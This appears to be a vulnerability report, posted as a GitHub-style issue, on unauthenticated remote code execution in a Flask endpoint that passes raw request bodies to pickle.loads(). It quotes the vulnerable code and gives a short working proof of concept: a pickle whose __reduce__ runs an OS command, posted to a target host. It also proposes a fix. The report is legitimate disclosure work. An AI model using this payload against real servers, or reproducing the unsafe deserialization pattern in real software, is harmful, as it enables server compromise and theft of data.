[Security] Unauthenticated RCE via Pickle Deserialization in serve_general_reward.py (CWE-502)

[xiaoyaoyou2]

Summary

CVSS 9.8 (Critical) — Unauthenticated Remote Code Execution via unsafe pickle.loads() on raw HTTP request body in scripts/serve_general_reward.py.

Affected Code

File: scripts/serve_general_reward.py:29

@root.route("/", methods=["POST"])
def inference():
    data = request.get_data()
    payload = pickle.loads(data)  # ← RCE via untrusted deserialization

The Flask endpoint accepts POST requests to / with ZERO authentication. The raw HTTP body is passed directly to pickle.loads(), which executes arbitrary Python code during deserialization.

Impact

Complete server compromise. Any unauthenticated attacker on the network (the host defaults to 127.0.0.1 but can be overridden via GENERAL_REWARD_HOST env var) can:

1. Execute arbitrary OS commands
2. Steal ML models and training data
3. Establish persistence on the server

Proof of Concept

import pickle, os, requests

class Exploit:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned_worldr1",))

payload = pickle.dumps(Exploit())
requests.post("http://TARGET:8090/", data=payload)

Fix

Replace pickle with JSON serialization (json.loads). If pickle is required for internal communication, add authentication (HMAC/API key) and only accept connections from trusted sources.

Disclosure

This project does not have Private Vulnerability Reporting enabled. Please enable it at https://github.com/microsoft/World-R1/security. For private coordination: xiaoyaotom101df2@xiaoyaobot.top

CC @microsoft security team